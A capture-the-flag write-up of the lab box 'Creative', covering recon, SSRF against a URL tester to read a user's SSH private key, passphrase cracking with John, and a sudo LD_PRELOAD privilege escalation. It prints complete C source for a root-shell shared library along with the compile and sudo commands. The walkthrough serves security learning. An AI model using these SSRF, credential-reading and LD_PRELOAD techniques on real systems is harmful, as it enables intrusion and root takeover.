Creative

Exploit a vulnerable web application and some misconfigurations to gain root privileges.

Recon

Let's start with a nmap scan.

The Nmap scan results show only two open ports: port 22, which is running SSH, and port 80, hosting a web server with nginx version 1.18.0.

┌──(kali㉿kali)-[~]
└─$ nmap -p- -T4 creative.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-15 11:48 BST
Host is up (0.17s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 430.03 seconds
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~]
└─$ nmap -p 22,80 -sC -sV -T4 creative.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-15 11:56 BST
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 11:56 (0:00:06 remaining)
Nmap scan report for creative.thm (10.10.127.96)
Host is up (0.18s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 a0:5c:1c:4e:b4:86:cf:58:9f:22:f9:7c:54:3d:7e:7b (RSA)
|   256 47:d5:bb:58:b6:c5:cc:e3:6c:0b:00:bd:95:d2:a0:fb (ECDSA)
|_  256 cb:7c:ad:31:41:bb:98:af:cf:eb:e4:88:7f:12:5e:89 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Creative Studio | Free Bootstrap 4.3.x template
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.94 seconds

Visting the site, it seems to be a webpage for a UI/UX, Web Development and App Design services.

Ferox buster didn't reveal any directories worth looking at. Subdomain enumeration revealed a subdomain beta.creative.thm.

After adding it to /etc/hosts we can visit this site. We encounter a beta URL tester that checks if a provided URL is live or dead. If the URL is live, we get redirected to the corresponding page. This setup appears to be vulnerable to Server-Side Request Forgery (SSRF) exploitation.

We can utilize Ffuf for port scanning by generating a port list using the seq command. After a short duration, we identify port 1337. The scan pauses briefly on port 5000, likely due to the presence of beta.creative.thm internally, causing a recursive call delay. However, the scan resumes shortly afterward.

Requesting the endpoint on 1337:

http://127.0.0.1:1337/

We make a request to the home directory and find a directory called saad. Which has user.txt.

Initial Access

We can also find the private SSH key of saad in the .ssh folder.

http://127.0.0.1:1337/home/saad/.ssh/id_rsa

After saving the key and adjusting permissions accordingly, we attempt to log in via SSH as Saad. However, we encounter a prompt requesting a passphrase for the SSH key.

We feed the SSH key into ssh2john to produce a hash that can be cracked using John the Ripper. Next, we crack the hash using John with rockyou.txt, and get the passphrase for the key.

┌──(kali㉿kali)-[~/Desktop/THM/creative]
└─$ ssh2john id_rsa > id_rsa.hash  
                                                                
┌──(kali㉿kali)-[~/Desktop/THM/creative]
└─$ john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt

With the passphrase obtained, we successfully log in and gain access as the user Saad. In the user's home directory, we locate the first flag, which was previously accessible via the beta.creative.thm website.

Privilege Escalation

sudo -l asks for a password, however while enumerating the user's home directory, we discover a .bash_history file containing valuable content. This file holds the credentials for the user Saad.

With the obtained credentials, we successfully query sudo -l. We find that we have permission to run /usr/bin/ping with sudo privileges. However, this alone does not provide a straightforward path for privilege escalation.

Fortunately for us, there's another option available: env_keep+=LD_PRELOAD.

LD_PRELOAD is an environment variable commonly used on Unix-like systems to preload shared libraries before others when a program is executed. This enables overriding functions in other shared libraries.

If an attacker can manipulate LD_PRELOAD to reference a malicious shared library, and if this environment variable is preserved when running commands with sudo, it presents an avenue for executing arbitrary code with elevated privileges.

We make use of a provided resource containing a previously mentioned shared library written in C. This library incorporates a function designed to elevate privileges to root by setting the user and group IDs to zero and spawning a shell. This effectively grants root shell access to the user.

shell.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/sh");
}

We compile the C code into a shared library.

gcc -fPIC -shared -o shell.so shell.c -nostartfiles
ls -al shell.so

Next, we execute the ping command with sudo privileges while setting LD_PRELOAD to the previously crafted shared library. This allows us to obtain a root shell, granting us access to extract the root flag located at /root.

sudo LD_PRELOAD=/tmp/shell.so /usr/bin/ping

Last updated

Was this helpful?